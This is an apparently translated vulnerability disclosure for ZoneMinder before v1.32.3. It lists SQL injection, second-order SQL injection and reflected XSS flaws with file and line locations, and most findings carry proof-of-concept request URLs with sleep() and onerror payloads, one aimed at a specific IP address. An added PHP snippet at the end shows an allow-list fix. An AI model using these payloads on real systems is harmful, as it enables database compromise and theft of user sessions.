ZoneMinder vulnerabilities before v1.32.3
Tags (space separated): 0day
The vulnerability information below was found against a ZoneMinder release of roughly version 1.32.0. The code structure changed in 1.32.3 and some of the code moved, but the vulnerabilities below have not been fixed; in 1.32.3 you need to locate the corresponding code yourself, since it is not exactly at the locations described below.
Progress on these vulnerabilities is tracked in ZoneMinder/zoneminder#2399, which is continually updated.
skins/classic/views/events.php line 44: SQL injection
In skins/classic/views/events.php line 44, the parameter $_REQUEST['filter'] is passed to the function parseFilter.
In includes/functions.php line 1401, the SQL string is built from $filter['terms'][$i]['cnj'] or $filter['terms'][$i]['obr'].
In 1.32.3 this part of the variable is changed to $terms[$i]['cnj'], and the terms come from $filter['Query']['terms'] at line 1035.
In the figure above, either the countSql or the eventsSql query can be injected.
PoC in 1.32.3:
index.php?view=events&page=1&filter[Query][terms][0][attr]=MonitorId&filter[Query][terms][0][op]=%3D&filter[Query][terms][0][val]=1&filter[Query][terms][0][cnj]=1%2b1)and%20sleep(3)%23
The information that follows applies in the same way; you need to adapt it to the corresponding version.
SQL query error: reflected XSS
When an SQL query fails, the SQL and the error message are displayed without any validation, sanitisation or output encoding.
includes/database.php line 120
If the SQL in the query is not validated, sanitised or output encoded and can be modified by the attacker, this leads to an XSS vulnerability.
https://95.143.216.108/zm/index.php?view=events&page=1&filter[terms][0][attr]=MonitorId&filter[terms][0][op]=%3D&filter[terms][0][val]=1&filter[terms][0][cnj]=1432%3Cimg/src=/%20onerror=alert`1`%3E
skins/classic/views/control.php line 35: second-order SQLi
In control.php line 35, the parameter $groupSql is read from the database and spliced directly into the SQL query statement.
It originates in includes/action.php line 748, where $monitors is inserted into the database.
First insert the malicious statement into the database, then select it to trigger the SQL injection.
PoC
Step 1:
index.php?action=group
newGroup[MonitorIds][]=1&newGroup[MonitorIds][]=2') or sleep(3)#&newGroup[Name]=132
Step 2:
http://127.0.0.1/zoneminder/www/?view=control&mid=1&group={groupid}
skins/classic/views/controlcap.php: reflected XSS
Most of the variables in controlcap.php are not filtered. This variable is passed directly from mid.
PoC
?view=controlcap&newControl[MinTiltRange]=2333%22/%3E%3Cimg/src=/%20onerror=alert(1)%3E
includes/functions.php daemonControl: command injection
ajax/status.php line 276: orderby SQL injection
PoC
http://127.0.0.1/zoneminder/www/?request=status&entity=monitor&element=id&id=1&sort=123
ajax/status.php line 393: SQL injection
There are two SQL injections in ajax/status.php, at line 393 and line 406.
As above, in includes/functions.php line 1401 the SQL comes from $filter['terms'][$i]['cnj'] or $filter['terms'][$i]['obr'].
index.php?request=status&entity=nearevents&element=id&id=13&layout=text&filter[Query][terms][0][cnj]=233)%20||1=1%23
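One way to close the parseFilter sink that both the events.php (line 44) and ajax/status.php (lines 393/406) findings rely on, as an added example that is not ZoneMinder's own code: every structural part of a filter term (attribute, operator, conjunction, bracket counts) is mapped through an allow-list and only the value is bound as a prepared-statement parameter, so a cnj value such as the one in the PoC can no longer become SQL. The attribute-to-column map, the operator set and the treatment of obr/cbr as bracket counts are assumptions made for illustration.

```php
<?php
// Added illustrative hardening of a parseFilter-style builder (not ZoneMinder's code):
// attribute, operator, conjunction and bracket counts pass through allow-lists and the
// value is bound as a prepared-statement parameter, so request input never becomes SQL.

const ATTRS = ['MonitorId' => 'E.MonitorId', 'Name' => 'E.Name'];   // assumed column map
const OPS   = ['=' => '=', '!=' => '!=', '>=' => '>=', '<=' => '<=', 'LIKE' => 'LIKE'];
const CNJS  = ['and' => 'AND', 'or' => 'OR'];
const INT_0_3 = ['options' => ['min_range' => 0, 'max_range' => 3]];

function buildFilterSql(array $terms): array {
    $sql = '';
    $params = [];
    foreach ($terms as $i => $term) {
        // cnj may only be one of two keywords; "1+1)and sleep(3)#" is rejected here.
        if (isset($term['cnj'])) {
            $cnj = strtolower((string)$term['cnj']);
            if (!array_key_exists($cnj, CNJS)) {
                throw new InvalidArgumentException("bad conjunction in term $i");
            }
            if ($i > 0) {
                $sql .= ' ' . CNJS[$cnj];
            }
        } elseif ($i > 0) {
            throw new InvalidArgumentException("missing conjunction in term $i");
        }
        // obr/cbr are taken as bracket counts (assumption) and validated as small ints.
        $obr = filter_var($term['obr'] ?? 0, FILTER_VALIDATE_INT, INT_0_3);
        $cbr = filter_var($term['cbr'] ?? 0, FILTER_VALIDATE_INT, INT_0_3);
        if ($obr === false || $cbr === false) {
            throw new InvalidArgumentException("bad bracket count in term $i");
        }
        $attr = (string)($term['attr'] ?? '');
        $op   = strtoupper((string)($term['op'] ?? ''));
        if (!array_key_exists($attr, ATTRS) || !array_key_exists($op, OPS)) {
            throw new InvalidArgumentException("bad attribute or operator in term $i");
        }
        $sql .= ' ' . str_repeat('(', $obr) . ATTRS[$attr] . ' ' . OPS[$op] . ' ?' . str_repeat(')', $cbr);
        $params[] = (string)($term['val'] ?? '');   // bound by the driver, never concatenated
    }
    return ['sql' => 'WHERE' . $sql, 'params' => $params];
}

// Constructed input in the shape of the page's PoC; buildFilterSql() rejects the cnj value.
$pocTerms = [['attr' => 'MonitorId', 'op' => '=', 'val' => '1', 'cnj' => '1+1)and sleep(3)#']];
try {
    buildFilterSql($pocTerms);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

The same pattern applies to the second-order case in control.php: values read back from the database ($groupSql) should be bound or allow-listed on the way into the query rather than trusted because they were stored.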